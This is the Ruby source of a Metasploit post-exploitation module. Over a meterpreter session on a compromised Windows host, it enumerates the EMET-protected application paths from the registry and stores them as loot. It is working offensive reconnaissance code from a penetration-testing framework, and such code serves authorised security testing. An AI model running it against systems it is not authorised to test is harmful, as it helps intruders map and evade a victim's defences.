1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Windows::Registry
8
  include Msf::Post::Common
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Windows Gather EMET Protected Paths',
15
        'Description' => %q{ This module will enumerate the EMET protected paths on the target host.},
16
        'License' => MSF_LICENSE,
17
        'Author' => [ 'vysec <vincent.yiu[at]mwrinfosecurity.com>' ],
18
        'Platform' => [ 'win' ],
19
        'SessionTypes' => [ 'meterpreter' ],
20
        'Notes' => {
21
          'Stability' => [CRASH_SAFE],
22
          'SideEffects' => [],
23
          'Reliability' => []
24
        }
25
      )
26
    )
27
  end
28

29
  def print_status(msg = '')
30
    super("#{peer} - #{msg}")
31
  end
32

33
  def print_good(msg = '')
34
    super("#{peer} - #{msg}")
35
  end
36

37
  def run
38
    reg_view = sysinfo['Architecture'] == ARCH_X64 ? REGISTRY_VIEW_64_BIT : REGISTRY_VIEW_32_BIT
39
    reg_vals = registry_enumvals('HKLM\\SOFTWARE\\Microsoft\\EMET\\AppSettings', reg_view)
40
    if reg_vals.nil?
41
      print_error('Failed to enumerate EMET Protected.')
42
    else
43
      print_status('Found protected processes:')
44
      reg_vals.each do |path|
45
        print_status(path)
46
      end
47
      path = store_loot('host.emet_paths', 'text/plain', session, reg_vals.join("\r\n"), 'emet_paths.txt', 'EMET Paths')
48
      print_good("Results stored in: #{path}")
49
    end
50
  end
51
end
52

53